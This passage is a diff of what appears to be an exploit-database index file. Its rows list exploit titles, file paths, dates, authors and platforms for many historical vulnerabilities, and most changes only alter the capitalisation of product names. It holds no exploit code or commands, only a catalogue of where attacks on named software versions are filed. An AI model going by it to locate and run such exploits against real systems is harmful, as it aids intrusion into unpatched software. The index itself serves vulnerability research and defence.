Handling Denial of Service (2)",2004-09-27,Coolio,windows,dos,0 24636,platforms/windows/dos/24636.c,"Microsoft Windows XP - TCP Packet Fragmentation Handling Denial of Service (3)",2004-09-27,"Ken Hollis",windows,dos,0 24637,platforms/windows/dos/24637.c,"Microsoft Windows XP - TCP Packet Fragmentation Handling Denial of Service (4)",2004-09-27,"Ken Hollis",windows,dos,0 -24638,platforms/php/webapps/24638.txt,"@lexPHPTeam @lex Guestbook 3.12 - Remote PHP File Include",2004-09-27,"Himeur Nourredine",php,webapps,0 +24638,platforms/php/webapps/24638.txt,"@lexPHPTeam @lex GuestBook 3.12 - Remote PHP File Include",2004-09-27,"Himeur Nourredine",php,webapps,0 24639,platforms/windows/dos/24639.c,"Microsoft SQL Server 7.0 - Remote Denial of Service (1)",2004-09-28,"securma massine",windows,dos,0 24640,platforms/windows/dos/24640.c,"Microsoft SQL Server 7.0 - Remote Denial of Service (2)",2004-09-28,"Sebastien Tricaud",windows,dos,0 -24641,platforms/php/webapps/24641.txt,"WordPress 1.2 - wp-login.php Multiple Parameter Cross-Site Scripting",2004-09-28,"Thomas Waldegger",php,webapps,0 -24642,platforms/php/webapps/24642.txt,"WordPress 1.2 - admin-header.php redirect_url Parameter Cross-Site Scripting",2004-09-28,"Thomas Waldegger",php,webapps,0 -24643,platforms/php/webapps/24643.txt,"WordPress 1.2 - bookmarklet.php Multiple Parameter Cross-Site Scripting",2004-09-28,"Thomas Waldegger",php,webapps,0 -24644,platforms/php/webapps/24644.txt,"WordPress 1.2 - categories.php cat_ID Parameter Cross-Site Scripting",2004-09-28,"Thomas Waldegger",php,webapps,0 -24645,platforms/php/webapps/24645.txt,"WordPress 1.2 - edit.php s Parameter Cross-Site Scripting",2004-09-28,"Thomas Waldegger",php,webapps,0 -24646,platforms/php/webapps/24646.txt,"WordPress 1.2 - edit-comments.php Multiple Parameter Cross-Site Scripting",2004-09-28,"Thomas Waldegger",php,webapps,0 +24641,platforms/php/webapps/24641.txt,"Wordpress 1.2 - wp-login.php Multiple Parameter Cross-Site Scripting",2004-09-28,"Thomas Waldegger",php,webapps,0 +24642,platforms/php/webapps/24642.txt,"Wordpress 1.2 - admin-header.php redirect_url Parameter Cross-Site Scripting",2004-09-28,"Thomas Waldegger",php,webapps,0 +24643,platforms/php/webapps/24643.txt,"Wordpress 1.2 - bookmarklet.php Multiple Parameter Cross-Site Scripting",2004-09-28,"Thomas Waldegger",php,webapps,0 +24644,platforms/php/webapps/24644.txt,"Wordpress 1.2 - categories.php cat_ID Parameter Cross-Site Scripting",2004-09-28,"Thomas Waldegger",php,webapps,0 +24645,platforms/php/webapps/24645.txt,"Wordpress 1.2 - edit.php s Parameter Cross-Site Scripting",2004-09-28,"Thomas Waldegger",php,webapps,0 +24646,platforms/php/webapps/24646.txt,"Wordpress 1.2 - edit-comments.php Multiple Parameter Cross-Site Scripting",2004-09-28,"Thomas Waldegger",php,webapps,0 24647,platforms/php/webapps/24647.txt,"parachat 5.5 - Directory Traversal",2004-09-28,"Donato Ferrante",php,webapps,0 24648,platforms/php/webapps/24648.txt,"W-Agora 4.1.6 - a redir_url.php key Parameter SQL Injection",2004-09-30,"Alexander Antipov",php,webapps,0 24649,platforms/php/webapps/24649.txt,"W-Agora 4.1.6 - a forgot_password.php userid Parameter Cross-Site Scripting",2004-09-30,"Alexander Antipov",php,webapps,0 @@ -21820,7 +21820,7 @@ id,file,description,date,author,platform,type,port 24664,platforms/php/webapps/24664.txt,"DCP-Portal 3.7/4.x/5.x - Multiple HTML Injection Vulnerabilities",2004-10-06,"Alexander Antipov",php,webapps,0 24665,platforms/php/webapps/24665.txt,"DCP-Portal 3.7/4.x/5.x - Calendar.php HTTP Response Splitting",2004-10-06,"Alexander Antipov",php,webapps,0 24666,platforms/asp/webapps/24666.txt,"Microsoft ASP.NET 1.x - URI Canonicalization Unauthorized Web Access",2004-10-06,anonymous,asp,webapps,0 -24667,platforms/php/webapps/24667.txt,"WordPress 1.2 - Wp-login.php HTTP Response Splitting",2004-10-07,"Chaotic Evil",php,webapps,0 +24667,platforms/php/webapps/24667.txt,"Wordpress 1.2 - Wp-login.php HTTP Response Splitting",2004-10-07,"Chaotic Evil",php,webapps,0 24668,platforms/multiple/dos/24668.txt,"Jera Technology Flash Messaging Server 5.2 - Remote Denial of Service",2004-10-07,"Luigi Auriemma",multiple,dos,0 24669,platforms/linux/remote/24669.txt,"MySQL 3.x/4.x - ALTER TABLE/RENAME Forces Old Permission Checks",2004-10-08,"Oleksandr Byelkin",linux,remote,0 24670,platforms/asp/webapps/24670.txt,"Go Smart Inc GoSmart Message Board - Multiple Input Validation Vulnerabilities",2004-10-11,"Positive Technologies",asp,webapps,0 @@ -21863,7 +21863,7 @@ id,file,description,date,author,platform,type,port 24922,platforms/multiple/webapps/24922.txt,"OTRS 3.x - FAQ Module Persistent Cross-Site Scripting",2013-04-08,"Luigi Vezzoso",multiple,webapps,0 24707,platforms/multiple/remote/24707.txt,"Google Desktop Search - Cross-Site Scripting",2004-10-26,"Salvatore Aranzulla",multiple,remote,0 24708,platforms/windows/dos/24708.txt,"Quicksilver Master of Orion III 1.2.5 - Multiple Remote Denial of Service Vulnerabilities",2004-10-27,"Luigi Auriemma",windows,dos,0 -24889,platforms/php/webapps/24889.txt,"WordPress Mathjax Latex Plugin 1.1 - Cross-Site Request Forgery",2013-03-26,"Junaid Hussain",php,webapps,0 +24889,platforms/php/webapps/24889.txt,"Wordpress Mathjax Latex Plugin 1.1 - Cross-Site Request Forgery",2013-03-26,"Junaid Hussain",php,webapps,0 24890,platforms/windows/remote/24890.rb,"ActFax 5.01 - RAW Server Buffer Overflow",2013-03-26,Metasploit,windows,remote,0 24710,platforms/multiple/dos/24710.txt,"id software quake ii server 3.2 - Multiple Vulnerabilities",2004-10-27,"Richard Stanway",multiple,dos,0 24711,platforms/php/remote/24711.php,"PHP 4.x/5 - cURL Open_Basedir Restriction Bypass",2004-10-28,FraMe,php,remote,0 @@ -21902,7 +21902,7 @@ id,file,description,date,author,platform,type,port 24745,platforms/windows/remote/24745.rb,"Honeywell HSC Remote Deployer - ActiveX Remote Code Execution",2013-03-13,Metasploit,windows,remote,0 24746,platforms/lin_x86-64/local/24746.c,"Linux Kernel 3.7.10 (Ubuntu 12.10 x64) - 'sock_diag_handlers' Privilege Escalation (2)",2013-03-13,"Kacper Szczesniak",lin_x86-64,local,0 24747,platforms/linux/dos/24747.c,"Linux Kernel 'SCTP_GET_ASSOC_STATS()' - Stack-Based Buffer Overflow",2013-03-13,"Petr Matousek",linux,dos,0 -24748,platforms/php/webapps/24748.txt,"event calendar - Multiple Vulnerabilities",2004-11-16,"Janek Vind",php,webapps,0 +24748,platforms/php/webapps/24748.txt,"event Calendar - Multiple Vulnerabilities",2004-11-16,"Janek Vind",php,webapps,0 24749,platforms/linux/local/24749.sh,"Cscope 13.0/15.x - Insecure Temporary File Creation Vulnerabilities (1)",2004-11-17,Gangstuck,linux,local,0 24750,platforms/linux/local/24750.c,"Cscope 13.0/15.x - Insecure Temporary File Creation Vulnerabilities (2)",2004-11-17,Gangstuck,linux,local,0 24751,platforms/php/webapps/24751.pl,"PHPBB 2.0.x - Admin_cash.php Remote PHP File Include",2004-11-17,"Jerome Athias",php,webapps,0 @@ -21914,7 +21914,7 @@ id,file,description,date,author,platform,type,port 24757,platforms/linux/local/24757.java,"opera Web browser 7.54 java implementation - Multiple Vulnerabilities (3)",2004-11-19,"Marc Schoenefeld",linux,local,0 24758,platforms/linux/local/24758.java,"opera Web browser 7.54 java implementation - Multiple Vulnerabilities (4)",2004-11-19,"Marc Schoenefeld",linux,local,0 24759,platforms/php/webapps/24759.txt,"IPBProArcade 2.5 - SQL Injection",2004-11-20,"axl daivy",php,webapps,0 -24760,platforms/hardware/remote/24760.txt,"ZyXEL 3 Prestige Router - HTTP Remote Administration Configuration Reset",2004-11-22,"Francisco Canela",hardware,remote,0 +24760,platforms/hardware/remote/24760.txt,"ZYXEL 3 Prestige Router - HTTP Remote Administration Configuration Reset",2004-11-22,"Francisco Canela",hardware,remote,0 24761,platforms/multiple/dos/24761.txt,"Gearbox Software Halo Game 1.x - Client Remote Denial of Service",2004-11-22,"Luigi Auriemma",multiple,dos,0 24762,platforms/php/webapps/24762.txt,"PHPKIT 1.6 - Multiple Input Validation Vulnerabilities",2004-11-22,Steve,php,webapps,0 24763,platforms/multiple/dos/24763.txt,"Sun Java Runtime Environment 1.x Java Plugin - JavaScript Security Restriction Bypass",2004-11-22,"Jouko Pynnonen",multiple,dos,0 @@ -21942,7 +21942,7 @@ id,file,description,date,author,platform,type,port 24786,platforms/jsp/webapps/24786.txt,"Cisco Video Surveillance Operations Manager 6.3.2 - Multiple vulnerabilities",2013-03-15,Bassem,jsp,webapps,0 24813,platforms/linux/remote/24813.pl,"gnu wget 1.x - Multiple Vulnerabilities",2004-12-10,"Jan Minar",linux,remote,0 24788,platforms/windows/dos/24788.py,"Nitro Pro 8.0.3.1 - Crash PoC",2013-03-15,"John Cobb",windows,dos,0 -24789,platforms/php/webapps/24789.rb,"WordPress LeagueManager Plugin 3.8 - SQL Injection",2013-03-15,"Joshua Reynolds",php,webapps,0 +24789,platforms/php/webapps/24789.rb,"Wordpress LeagueManager Plugin 3.8 - SQL Injection",2013-03-15,"Joshua Reynolds",php,webapps,0 24790,platforms/php/webapps/24790.txt,"ClipShare 4.1.4 - Multiple Vulnerabilities",2013-03-15,AkaStep,php,webapps,0 24791,platforms/java/webapps/24791.txt,"Open-Xchange Server 6 - Multiple Vulnerabilities",2013-03-15,"Martin Braun",java,webapps,0 24792,platforms/multiple/webapps/24792.txt,"IPCop 1.4.1 - Web Administration Interface Proxy Log HTML Injection",2004-11-30,"Paul Kurczaba",multiple,webapps,0 @@ -21950,7 +21950,7 @@ id,file,description,date,author,platform,type,port 24794,platforms/linux/remote/24794.sh,"SCPOnly 2.x/3.x - Arbitrary Command Execution",2004-12-02,"Jason Wies",linux,remote,0 24795,platforms/linux/remote/24795.txt,"RSSH 2.x - Arbitrary Command Execution",2004-12-02,"Jason Wies",linux,remote,0 24796,platforms/php/webapps/24796.txt,"Blog Torrent 0.8 - Remote Directory Traversal",2004-12-02,"Steve Kemp",php,webapps,0 -24797,platforms/php/webapps/24797.txt,"Advanced Guestbook 2.2/2.3 - Cross-Site Scripting",2004-12-02,"Emile van Elen",php,webapps,0 +24797,platforms/php/webapps/24797.txt,"Advanced GuestBook 2.2/2.3 - Cross-Site Scripting",2004-12-02,"Emile van Elen",php,webapps,0 24798,platforms/php/webapps/24798.txt,"PAFileDB 3.1 - Error Message Full Path Disclosure",2004-12-04,y3dips,php,webapps,0 24799,platforms/multiple/dos/24799.txt,"Mozilla0.x / Netscape 3/4 / Firefox 1.0 - JavaScript IFRAME Rendering Denial Of Servic",2004-12-06,"Niek van der Maas",multiple,dos,0 24800,platforms/windows/remote/24800.txt,"Microsoft Internet Explorer 5.0.1 - FTP URI Arbitrary FTP Server Command Execution",2004-12-06,"Albert Puigsech Galicia",windows,remote,0 @@ -22002,13 +22002,13 @@ id,file,description,date,author,platform,type,port 24847,platforms/php/webapps/24847.txt,"phpGroupWare 0.9.x - 'index.php' Multiple Parameter SQL Injection",2004-12-15,"James Bercegay",php,webapps,0 24848,platforms/linux/remote/24848.txt,"ChBg 1.5 - Scenario File Overflow",2004-12-15,"Danny Lungstrom",linux,remote,0 24849,platforms/php/webapps/24849.txt,"DaloRadius - Multiple Vulnerabilities",2013-03-18,"Saadi Siddiqui",php,webapps,0 -24850,platforms/php/webapps/24850.txt,"WordPress Simply Poll Plugin 1.4.1 - Multiple Vulnerabilities",2013-03-18,m3tamantra,php,webapps,0 +24850,platforms/php/webapps/24850.txt,"Wordpress Simply Poll Plugin 1.4.1 - Multiple Vulnerabilities",2013-03-18,m3tamantra,php,webapps,0 24851,platforms/php/webapps/24851.txt,"Joomla RSfiles Component (cid parameter) - SQL Injection",2013-03-18,ByEge,php,webapps,0 24855,platforms/php/dos/24855.txt,"PHP 3/4/5 - Multiple Local And Remote Vulnerabilities (2)",2004-12-15,Slythers,php,dos,0 24856,platforms/linux/remote/24856.c,"NapShare 1.2 - Remote Buffer Overflow (1)",2004-12-06,"Bartlomiej Sieka",linux,remote,0 24857,platforms/linux/remote/24857.c,"NapShare 1.2 - Remote Buffer Overflow (2)",2004-12-10,"Bartlomiej Sieka",linux,remote,0 -24858,platforms/php/webapps/24858.html,"WordPress Occasions Plugin 1.0.4 - Cross-Site Request Forgery",2013-03-19,m3tamantra,php,webapps,0 -24859,platforms/php/webapps/24859.rb,"WordPress Count per Day Plugin 3.2.5 - (counter.php) Cross-Site Scripting",2013-03-19,m3tamantra,php,webapps,0 +24858,platforms/php/webapps/24858.html,"Wordpress Occasions Plugin 1.0.4 - Cross-Site Request Forgery",2013-03-19,m3tamantra,php,webapps,0 +24859,platforms/php/webapps/24859.rb,"Wordpress Count per Day Plugin 3.2.5 - (counter.php) Cross-Site Scripting",2013-03-19,m3tamantra,php,webapps,0 24860,platforms/hardware/webapps/24860.txt,"Verizon Fios Router MI424WR-GEN3I - Cross-Site Request Forgery",2013-03-19,"Jacob Holcomb",hardware,webapps,0 24861,platforms/php/webapps/24861.txt,"Rebus:list - (list.php list_id parameter) SQL Injection",2013-03-19,"Robert Cooper",php,webapps,0 24862,platforms/php/webapps/24862.txt,"ViewGit 0.0.6 - Multiple Cross-Site Scripting Vulnerabilities",2013-03-19,"Matthew R. Bucci",php,webapps,0 @@ -22016,8 +22016,8 @@ id,file,description,date,author,platform,type,port 24864,platforms/hardware/webapps/24864.pl,"StarVedia IPCamera IC502w IC502w+ v020313 - Username/Password Disclosure",2013-03-22,"Todor Donev",hardware,webapps,0 24865,platforms/linux/dos/24865.txt,"GnuTLS libgnutls - Double-free Certificate List Parsing Remote Denial of Service",2013-03-22,"Shawn the R0ck",linux,dos,0 24866,platforms/hardware/dos/24866.txt,"TP-Link TL-WR740N Wireless Router - Denial of Service",2013-03-22,LiquidWorm,hardware,dos,0 -24867,platforms/php/webapps/24867.html,"WordPress IndiaNIC FAQs Manager Plugin 1.0 - Multiple Vulnerabilities",2013-03-22,m3tamantra,php,webapps,0 -24868,platforms/php/webapps/24868.rb,"WordPress IndiaNIC FAQs Manager Plugin 1.0 - Blind SQL Injection",2013-03-22,m3tamantra,php,webapps,0 +24867,platforms/php/webapps/24867.html,"Wordpress IndiaNIC FAQs Manager Plugin 1.0 - Multiple Vulnerabilities",2013-03-22,m3tamantra,php,webapps,0 +24868,platforms/php/webapps/24868.rb,"Wordpress IndiaNIC FAQs Manager Plugin 1.0 - Blind SQL Injection",2013-03-22,m3tamantra,php,webapps,0 24869,platforms/php/webapps/24869.txt,"AContent 1.3 - Local File Inclusion",2013-03-22,DaOne,php,webapps,0 24870,platforms/php/webapps/24870.txt,"Flatnux CMS 2013-01.17 - (index.php theme parameter) Local File Inclusion",2013-03-22,DaOne,php,webapps,0 24871,platforms/php/webapps/24871.txt,"Slash CMS - Multiple Vulnerabilities",2013-03-22,DaOne,php,webapps,0 @@ -22059,7 +22059,7 @@ id,file,description,date,author,platform,type,port 24910,platforms/windows/local/24910.txt,"VirtualDJ Pro/Home 7.3 - Buffer Overflow",2013-04-02,"Alexandro Sánchez Bach",windows,local,0 24911,platforms/php/webapps/24911.txt,"Pollen CMS 0.6 - (index.php p parameter) Local File Disclosure",2013-04-02,MizoZ,php,webapps,0 24913,platforms/php/webapps/24913.txt,"Network Weathermap 0.97a - (editor.php) Persistent Cross-Site Scripting",2013-04-02,"Daniel Ricardo dos Santos",php,webapps,0 -24914,platforms/php/webapps/24914.txt,"WordPress FuneralPress Plugin 1.1.6 - Persistent Cross-Site Scripting",2013-04-02,"Rob Armstrong",php,webapps,0 +24914,platforms/php/webapps/24914.txt,"Wordpress FuneralPress Plugin 1.1.6 - Persistent Cross-Site Scripting",2013-04-02,"Rob Armstrong",php,webapps,0 24915,platforms/multiple/webapps/24915.txt,"Aspen 0.8 - Directory Traversal",2013-04-02,"Daniel Ricardo dos Santos",multiple,webapps,0 24916,platforms/hardware/webapps/24916.txt,"Netgear WNR1000 - Authentication Bypass",2013-04-02,"Roberto Paleari",hardware,webapps,0 24919,platforms/windows/local/24919.py,"HexChat 2.9.4 - Local Exploit",2013-04-07,"Matt Andreko",windows,local,0 @@ -22113,7 +22113,7 @@ id,file,description,date,author,platform,type,port 25091,platforms/multiple/remote/25091.txt,"realnetworks realarcade 1.2.0.994 - Multiple Vulnerabilities",2005-02-08,"Luigi Auriemma",multiple,remote,0 25816,platforms/php/webapps/25816.txt,"Ovidentia FX - Remote File Inclusion",2005-06-10,Status-x,php,webapps,0 25817,platforms/cgi/webapps/25817.txt,"JamMail 1.8 - Jammail.pl Arbitrary Command Execution",2005-06-12,blahplok,cgi,webapps,0 -25818,platforms/php/webapps/25818.txt,"Singapore 0.9.11 beta Image Gallery - 'index.php' Cross-Site Scripting",2005-06-13,TheGreatOne2176,php,webapps,0 +25818,platforms/php/webapps/25818.txt,"Singapore 0.9.11 Beta Image Gallery - 'index.php' Cross-Site Scripting",2005-06-13,TheGreatOne2176,php,webapps,0 24972,platforms/windows/dos/24972.c,"Flightgear 2.0/2.4 - Remote Format String Exploit",2013-04-22,Kurono,windows,dos,0 24973,platforms/php/webapps/24973.txt,"VoipNow 2.5 - Local File Inclusion",2013-04-22,i-Hmx,php,webapps,0 24974,platforms/hardware/remote/24974.rb,"Netgear DGN2200B - pppoe.cgi Remote Command Execution",2013-04-22,Metasploit,hardware,remote,0 @@ -22129,12 +22129,12 @@ id,file,description,date,author,platform,type,port 24985,platforms/php/remote/24985.txt,"PHP 4/5 - addslashes() NULL Byte Bypass",2004-12-16,"Daniel Fabian",php,remote,0 24986,platforms/cgi/webapps/24986.txt,"Ikonboard 3.x - Multiple SQL Injections",2004-12-16,anonymous,cgi,webapps,0 24987,platforms/php/webapps/24987.txt,"JSBoard 2.0.x - Arbitrary Script Upload",2004-12-16,"Jeremy Bae",php,webapps,0 -24988,platforms/php/webapps/24988.txt,"WordPress 1.2.1/1.2.2 - /wp-admin/post.php content Parameter Cross-Site Scripting",2004-12-16,"Thomas Waldegger",php,webapps,0 -24989,platforms/php/webapps/24989.txt,"WordPress 1.2.1/1.2.2 - /wp-admin/templates.php file Parameter Cross-Site Scripting",2004-12-16,"Thomas Waldegger",php,webapps,0 -24990,platforms/php/webapps/24990.txt,"WordPress 1.2.1/1.2.2 - link-add.php Multiple Parameter Cross-Site Scripting",2004-12-16,"Thomas Waldegger",php,webapps,0 -24991,platforms/php/webapps/24991.txt,"WordPress 1.2.1/1.2.2 - link-categories.php cat_id Parameter Cross-Site Scripting",2004-12-16,"Thomas Waldegger",php,webapps,0 -24992,platforms/php/webapps/24992.txt,"WordPress 1.2.1/1.2.2 - link-manager.php Multiple Parameter Cross-Site Scripting",2004-12-16,"Thomas Waldegger",php,webapps,0 -24993,platforms/php/webapps/24993.txt,"WordPress 1.2.1/1.2.2 - moderation.php item_approved Parameter Cross-Site Scripting",2004-12-16,"Thomas Waldegger",php,webapps,0 +24988,platforms/php/webapps/24988.txt,"Wordpress 1.2.1/1.2.2 - /wp-admin/post.php content Parameter Cross-Site Scripting",2004-12-16,"Thomas Waldegger",php,webapps,0 +24989,platforms/php/webapps/24989.txt,"Wordpress 1.2.1/1.2.2 - /wp-admin/templates.php file Parameter Cross-Site Scripting",2004-12-16,"Thomas Waldegger",php,webapps,0 +24990,platforms/php/webapps/24990.txt,"Wordpress 1.2.1/1.2.2 - link-add.php Multiple Parameter Cross-Site Scripting",2004-12-16,"Thomas Waldegger",php,webapps,0 +24991,platforms/php/webapps/24991.txt,"Wordpress 1.2.1/1.2.2 - link-categories.php cat_id Parameter Cross-Site Scripting",2004-12-16,"Thomas Waldegger",php,webapps,0 +24992,platforms/php/webapps/24992.txt,"Wordpress 1.2.1/1.2.2 - link-manager.php Multiple Parameter Cross-Site Scripting",2004-12-16,"Thomas Waldegger",php,webapps,0 +24993,platforms/php/webapps/24993.txt,"Wordpress 1.2.1/1.2.2 - moderation.php item_approved Parameter Cross-Site Scripting",2004-12-16,"Thomas Waldegger",php,webapps,0 24994,platforms/php/webapps/24994.txt,"MediaWiki 1.3.x - Arbitrary Script Upload",2004-12-16,"Jeremy Bae",php,webapps,0 24995,platforms/multiple/remote/24995.txt,"DXFScope 0.2 - Remote Client-Side Buffer Overflow",2004-12-16,"Ariel Berkman",multiple,remote,0 24996,platforms/windows/remote/24996.rb,"SAP ConfigServlet - Remote Unauthenticated Payload Execution (Metasploit)",2013-04-25,"Andras Kabai",windows,remote,0 @@ -22220,7 +22220,7 @@ id,file,description,date,author,platform,type,port 25064,platforms/php/webapps/25064.txt,"Magic Winmail Server 4.0 - (Build 1112) download.php Traversal Arbitrary File Access",2005-01-27,"Tan Chew Keong",php,webapps,0 25065,platforms/php/webapps/25065.txt,"Magic Winmail Server 4.0 - (Build 1112) upload.php Traversal Arbitrary File Upload",2005-01-27,"Tan Chew Keong",php,webapps,0 25066,platforms/multiple/remote/25066.txt,"WebWasher Classic 2.2/2.3 - HTTP CONNECT Unauthorized Access",2005-01-28,"Oliver Karow",multiple,remote,0 -25067,platforms/cgi/webapps/25067.txt,"alt-n webadmin 3.0.2 - Multiple Vulnerabilities",2005-01-28,"David A. P?rez",cgi,webapps,0 +25067,platforms/cgi/webapps/25067.txt,"alt-n WebAdmin 3.0.2 - Multiple Vulnerabilities",2005-01-28,"David A. P?rez",cgi,webapps,0 25068,platforms/php/webapps/25068.txt,"IceWarp Web Mail 5.3 - login.html username Parameter Cross-Site Scripting",2005-01-28,ShineShadow,php,webapps,0 25069,platforms/php/webapps/25069.txt,"IceWarp Web Mail 5.3 - accountsettings_add.html accountid Parameter Cross-Site Scripting",2005-01-28,ShineShadow,php,webapps,0 25070,platforms/linux/dos/25070.c,"ngIRCd 0.6/0.7/0.8 - Remote Buffer Overflow",2005-01-28,"Florian Westphal",linux,dos,0 @@ -22255,7 +22255,7 @@ id,file,description,date,author,platform,type,port 25102,platforms/php/webapps/25102.txt,"CitrusDB 0.3.6 - Remote Authentication Bypass",2004-02-15,"RedTeam Pentesting",php,webapps,0 25103,platforms/php/webapps/25103.txt,"PHP-Nuke 6.x/7.x - Multiple Cross-Site Scripting Vulnerabilities",2005-02-15,waraxe,php,webapps,0 25104,platforms/php/webapps/25104.txt,"CitrusDB 0.3.6 - Arbitrary Local PHP File Include",2005-02-15,"RedTeam Pentesting",php,webapps,0 -25105,platforms/php/webapps/25105.txt,"OSCommerce 2.2 - Contact_us.php Cross-Site Scripting",2005-02-15,"John Cobb",php,webapps,0 +25105,platforms/php/webapps/25105.txt,"osCommerce 2.2 - Contact_us.php Cross-Site Scripting",2005-02-15,"John Cobb",php,webapps,0 25106,platforms/linux/local/25106.c,"Typespeed 0.4.1 - Local Format String",2005-02-16,"Ulf Harnhammar",linux,local,0 25107,platforms/hardware/dos/25107.txt,"Check Point VPN-1 SecureClient - Malformed IP Address Local Memory Access",2005-02-16,"Wang Ning",hardware,dos,0 25108,platforms/cgi/webapps/25108.txt,"AWStats 5.x/6.x - Logfile Parameter Remote Command Execution",2005-02-16,newbug@chroot.org,cgi,webapps,0 @@ -22287,7 +22287,7 @@ id,file,description,date,author,platform,type,port 25134,platforms/linux/local/25134.c,"sudo 1.8.0-1.8.3p1 (sudo_debug) - Root Exploit + glibc FORTIFY_SOURemote Code Execution Bypass",2013-05-01,aeon,linux,local,0 25135,platforms/windows/dos/25135.txt,"Syslog Watcher Pro 2.8.0.812 - (Date Parameter) Cross-Site Scripting",2013-05-01,demonalex,windows,dos,0 25136,platforms/php/remote/25136.rb,"phpMyAdmin - Authenticated Remote Code Execution via preg_replace()",2013-05-01,Metasploit,php,remote,0 -25137,platforms/php/remote/25137.rb,"WordPress W3 Total Cache Plugin - PHP Code Execution",2013-05-01,Metasploit,php,remote,0 +25137,platforms/php/remote/25137.rb,"Wordpress W3 Total Cache Plugin - PHP Code Execution",2013-05-01,Metasploit,php,remote,0 25138,platforms/hardware/webapps/25138.txt,"D-Link IP Cameras - Multiple Vulnerabilities",2013-05-01,"Core Security",hardware,webapps,0 25139,platforms/hardware/webapps/25139.txt,"Vivotek IP Cameras - Multiple Vulnerabilities",2013-05-01,"Core Security",hardware,webapps,0 25140,platforms/windows/dos/25140.txt,"WPS Office - Wpsio.dll Stack Buffer Overflow",2013-05-01,Zhangjiantao,windows,dos,0 @@ -22308,7 +22308,7 @@ id,file,description,date,author,platform,type,port 25155,platforms/php/webapps/25155.txt,"phpMyAdmin 2.6 - theme_right.css.php Multiple Parameter Cross-Site Scripting",2005-02-24,"Maksymilian Arciemowicz",php,webapps,0 25156,platforms/php/webapps/25156.txt,"phpMyAdmin 2.6 - Multiple Local File Inclusion",2005-02-24,"Maksymilian Arciemowicz",php,webapps,0 25157,platforms/windows/remote/25157.txt,"Microsoft Log Sink Class - ActiveX Control Arbitrary File Creation",2003-04-29,"Shane Hird",windows,remote,0 -25158,platforms/php/webapps/25158.txt,"OOApp Guestbook - Multiple HTML Injection Vulnerabilities",2005-02-24,m1o1d1,php,webapps,0 +25158,platforms/php/webapps/25158.txt,"OOApp GuestBook - Multiple HTML Injection Vulnerabilities",2005-02-24,m1o1d1,php,webapps,0 25159,platforms/jsp/webapps/25159.txt,"cyclades alterpath manager 1.1 - Multiple Vulnerabilities",2005-02-24,sullo@cirt.net,jsp,webapps,0 25160,platforms/php/webapps/25160.txt,"PunBB 3.0/3.1 - Multiple Remote Input Validation Vulnerabilities",2005-02-24,"John Gumbel",php,webapps,0 25161,platforms/php/webapps/25161.txt,"PHPWebSite 0.x - Image File Processing Arbitrary PHP File Upload",2005-02-24,tjomka,php,webapps,0 @@ -22393,7 +22393,7 @@ id,file,description,date,author,platform,type,port 25253,platforms/asp/webapps/25253.txt,"betaparticle blog 2.0/3.0 - upload.asp Unauthenticated File Upload",2005-03-21,"farhad koosha",asp,webapps,0 25254,platforms/asp/webapps/25254.txt,"betaparticle blog 2.0/3.0 - myFiles.asp Unauthenticated File Manipulation",2005-03-21,"farhad koosha",asp,webapps,0 25255,platforms/windows/dos/25255.txt,"FUN labs Game Engine - Multiple Remote Denial of Service Vulnerabilities",2005-03-20,"Luigi Auriemma",windows,dos,0 -25256,platforms/osx/local/25256.c,"Apple Mac OS X 10.3.x - Multiple Vulnerabilities",2005-03-21,V9,osx,local,0 +25256,platforms/osx/local/25256.c,"Apple Mac OSX 10.3.x - Multiple Vulnerabilities",2005-03-21,V9,osx,local,0 25257,platforms/php/webapps/25257.txt,"Kayako ESupport 2.3 - 'index.php' Multiple Parameter Cross-Site Scripting",2005-03-22,"James Bercegay",php,webapps,0 25258,platforms/php/webapps/25258.txt,"Phorum 3.x/5.0.x - HTTP Response Splitting",2005-03-22,"Alexander Anisimov",php,webapps,0 25259,platforms/windows/dos/25259.py,"Microsoft Windows XP - Local Denial of Service",2005-03-22,liquid@cyberspace.org,windows,dos,0 @@ -22467,7 +22467,7 @@ id,file,description,date,author,platform,type,port 25328,platforms/php/webapps/25328.txt,"AlstraSoft EPay Pro 2.0 - Multiple Cross-Site Scripting Vulnerabilities",2005-04-01,Dcrab,php,webapps,0 25329,platforms/windows/dos/25329.cfg,"Star Wars Jedi Knight: Jedi Academy 1.0.11 - Buffer Overflow",2005-04-02,"Luigi Auriemma",windows,dos,0 25330,platforms/php/webapps/25330.txt,"phpMyAdmin 2.x - Convcharset Cross-Site Scripting",2005-04-03,"Oriol Torrent Santiago",php,webapps,0 -25331,platforms/cgi/webapps/25331.txt,"SonicWALL SOHO 5.1.7 Web Interface - Multiple Remote Input Validation Vulnerabilities",2005-04-04,"Oliver Karow",cgi,webapps,0 +25331,platforms/cgi/webapps/25331.txt,"SonicWALL SOHO 5.1.7 - Web Interface Multiple Remote Input Validation Vulnerabilities",2005-04-04,"Oliver Karow",cgi,webapps,0 25332,platforms/asp/webapps/25332.txt,"SiteEnable - SQL Injection",2005-04-02,Zinho,asp,webapps,0 25333,platforms/unix/local/25333.c,"SCO OpenServer 5.0.6/5.0.7 - NWPrint Command Line Argument Local Buffer Overflow",2005-04-04,"pasquale minervini",unix,local,0 25334,platforms/linux/dos/25334.txt,"Mozilla Suite/Firefox - JavaScript Lambda Replace Heap Memory Disclosure",2005-04-04,"Daniel McNeil",linux,dos,0 @@ -22575,7 +22575,7 @@ id,file,description,date,author,platform,type,port 25437,platforms/php/webapps/25437.txt,"eGroupWare 1.0 - 'index.php' cats_app Parameter SQL Injection",2005-04-18,"GulfTech Security",php,webapps,0 25438,platforms/php/webapps/25438.txt,"MVNForum 1.0 - Search Cross-Site Scripting",2005-04-18,"hoang yen",php,webapps,0 25439,platforms/multiple/dos/25439.c,"Multiple Vendor - TCP Session Acknowledgement Number Denial of Service",2004-12-13,"Antonio M. D. S. Fortes",multiple,dos,0 -25440,platforms/php/webapps/25440.txt,"WordPress wp-FileManager Plugin - Arbitrary File Download",2013-05-14,ByEge,php,webapps,0 +25440,platforms/php/webapps/25440.txt,"Wordpress wp-FileManager Plugin - Arbitrary File Download",2013-05-14,ByEge,php,webapps,0 25441,platforms/php/webapps/25441.txt,"IPB (Invision Power Board) 1.x? / 2.x / 3.x - Admin Account Takeover",2013-05-14,"John JEAN",php,webapps,0 25442,platforms/php/webapps/25442.txt,"WHMCS 4.x - (invoicefunctions.php id parameter) SQL Injection",2013-05-14,"Ahmed Aboul-Ela",php,webapps,0 25443,platforms/windows/dos/25443.txt,"Quick Search 1.1.0.189 - Buffer Overflow (SEH)",2013-05-14,ariarat,windows,dos,0 @@ -22648,7 +22648,7 @@ id,file,description,date,author,platform,type,port 25515,platforms/asp/webapps/25515.txt,"CartWIZ 1.10 - 